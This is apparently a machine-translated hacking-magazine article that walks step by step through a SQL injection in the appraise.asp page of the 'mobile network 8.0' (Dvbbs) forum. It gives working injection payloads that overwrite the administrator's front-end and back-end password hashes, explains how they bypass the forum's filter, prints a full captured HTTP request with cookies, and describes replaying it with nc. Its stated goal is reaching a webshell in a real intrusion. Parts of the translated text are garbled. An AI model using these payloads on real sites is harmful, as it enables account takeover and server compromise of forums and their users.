Mobile Network 8.0's latest remote Injection Vulnerability

This article has already been published in the magazine no. 9th of the "black guest XFile". Please indicate the source for reprinting!

It is said that since the launch of v5.6, mobile network has rarely exposed high-risk vulnerabilities. I am so tired that I can't help myself in the face of mobile network 8.0! Fortunately, a very serious remote injection vulnerability has finally emerged, but it is only valid for the SQL version, and the access version is not affected. The problematic file is appraise. asp. This vulnerability allows you to change the administrator password directly, but the operation may make it inconvenient. To test the detailed exploitation of this vulnerability, I set up a forum on the local machine for the dynamic network 8.0 SQL version. After the test environment is set up, you can test the vulnerability. The Administrator's username (Admin) and password (admin888) are known ). Register a common user whose username and password are hackest, log on to the Forum, and send a topic post to any forum. After posting, click "click to participate in comments" in the lower-right corner of the returned post browsing page.

Enter the comment page, 2.

Then enable the packet capture tool Winsock Expert to prepare for packet capture, 3.

Then fill in some content on the comment page. Do not fill in the verification code incorrectly. Then click "post comments" to submit the comment, prompting that the comment is successful, click "OK" and return to the packet capture tool to find the information we need, 4.

Secret text file. The next operation may be a bit complicated, because we need to construct this data packet and then submit it using NC. We need to construct the injection statement first. For example, to change the front-end login password of an administrator user, we can construct the statement as follows:
% 3 bdeclare + @ A + sysname + select
+ @ A % 3d0x6500650065003000310063003900610062003700320036003700660032003500
+ Update + DV % 5 Fuser + set + userpassword % 3d @ A + where + userid % 3d1
The original form of this Code is:
; Declare @ A sysname select @ A = 0x6500650065003000310063003900610062003700320036003700660032003500.
Update dv_user set userpassword = @ A where userid = 1
The general meaning of this statement is to change the userpassword field userpassword of userid = 1 in the dv_user table to hackest (where 0x6500650065003000310063003900610062003700320036003700660032003500 is converted as follows: encrypt the hackest character into the MD5 hash eee01c9ab3167f25 of the 16 character, and then use the Conversion Tool to convert eee01c9ab3167f25 to the SQL _en character.) 5. Figure 6.

The reason for this deformation is to bypass the filtering of dynamic network 8.0. If you find it hard to understand it, you can read it several times and try it out. The modified injection statement we constructed: ● % 3 bdeclare + @ A + sysname + select + @ A % 3d0x65006500300031006300390061006200
Next to topicid = 1 in the last row of 3700320036003700660032003500 bytes, calculate the number of characters added to the data packet (the original data packet length is 90, and the number of characters added is 152, which is 242 in total ), therefore, change 90 After Content-Length to 242 and save it. Note that the operation must be careful, because if the packet length is incorrect, it will fail to be submitted using NC. Before performing the NC submit operation, let's take a look at the admin userpassword field in the dv_user table as 469e80d32c0559f8, 7.

The following code uses the ncfile to submit a data package. Put nc.exeand test.txt in the same directory (I am here in the C root directory), and then run the command: ● NC 127.0.0.1 80 ●, 8.

If this information is returned, the Administrator admin's front-end logon password has been successfully changed without an accident. As I set up a test environment on the local machine, I can easily View data changes. First, check whether it is successful. Obviously, it is successful. Userpassword has changed from the original admin888 16-bit MD5 (469e80d32c0559f8) to hackest's 16-bit MD5 (eee01c9ab%7f25), 9.

This vulnerability is successfully tested. However, in actual intrusion, we also need to change the Administrator's background logon password to enter the background to obtain the webshell. However, the operation just changed the Administrator's front-end login password. We can construct the following data packet to change the Administrator's background login password:
% 3 bdeclare + @ A + sysname + select
+ @ A % 3d0x6500650065003000310063003900610062003700320036003700660032003500
+ Update + DV % 5 fadmin + set + password % 3d @ A + where + id % 3d1
The prototype is:
; Declare @ A sysname select @ A = 0x6500650065003000310063003900610062003700320036003700660032003500.
Update dv_admin SET Password = @ A where id = 1
When the sentence is changed, it is saved after the topicid = 1 of the last row inserted in test.txt. After NC is submitted, information similar to figure 8 is returned. Submit and we find that the admin background logon password has been successfully changed, 10.

You can log on to the background with the new password.

The manual test of the vulnerability is complete. It may be too troublesome for food providers. Are there any related tools to use it. The answer is yes. The ox people have already written a tool for exploitation, interface 12.

The information to be filled in also needs to be captured, including URL, boardid, topicid, announceid, verification code (acodestr), Cookie, etc. The captured Package content is similar to the following data:
Post/appraise. asp? Action = save HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/MSWord, application/X-Shockwave-flash ,*/*
Referer: http: // 127.0.0.1/dispbbs. asp? Boardid = 1 & id = 1 & page = 1
Accept-language: ZH-CN
Content-Type: Application/X-WWW-form-urlencoded
UA-CPU: x86
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; sv1; tencenttraveler;. Net CLR 1.1.4322)
HOST: 127.0.0.1
Content-Length: 90
Connection: keep-alive
Cache-control: No-Cache
COOKIE: w0802 = 2; rtime = 1; ltime = 1187503483390; w08_eid = 57689537-http % 3A // 127.0.0.1/index. asp % 3 fboardid % 3d1; dvforum = userid = 2 & usercookies = 0 & statuserid = 4086140 & userclass =
% D0 % C2 % Ca % D6 % C9 % CF % C2 % B7 & username = hackest & Password = v0qdt2f765u6x7j5 & userhidden = 2; geturl = % 2 fpost % 5 fupload % 2 EASP % 3 fboardid % 3d1; bandwidth = enabled; upnum = 0; dvbbs = baffbdfhbe; aspsessionidqqqrsraq = enabled; aspsessionidqsqrtraq = Enabled
Boardid = 1 & topicid = 1 & announceid = 1 & Atype = 0 & a1 = 0 & a2 = 0 & atitle = Test & acodestr = 8598 & acontent = test

You can fill in the required data by referring to the content, and then fill in the SQL Injection Column with ●; declare @ A sysname select @ A = 0x3400360039006500380030006400330032006300300035003500390066003800
Update dv_admin SET Password = @ A where id = 1 ● (change the password to admin888), click the "code" button next to it (that is, the deformation process is completed), and then submit, 13.

The Administrator's background logon password is also changed to admin888, 14.

So far, the test process of this vulnerability has been completed, and the operation may be more complicated. As for how to get webshell in the background, please refer to the method described in the previous article "mobile network 8.0 background webshell large battle.